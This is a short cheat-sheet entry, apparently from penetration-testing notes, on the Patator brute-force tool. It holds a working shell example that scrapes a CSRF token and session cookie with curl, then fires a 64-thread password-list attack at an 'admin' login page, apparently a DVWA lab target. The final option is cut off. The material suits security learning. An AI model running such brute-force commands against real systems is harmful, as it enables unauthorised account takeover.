# Patator Bruteforcing * [Lanjelot's Repo](https://github.com/lanjelot/patator/) ## Modules * Available modules can be found under `patator --help` * Module specifics can be found via `patator -h` ## Using a Module * For example `http_fuzz` can be used via ```sh TARGET_IP= CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}') echo "The CSRF is: $CSRF" echo "The PHPSESSID is: $SESSION_ID" patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x ```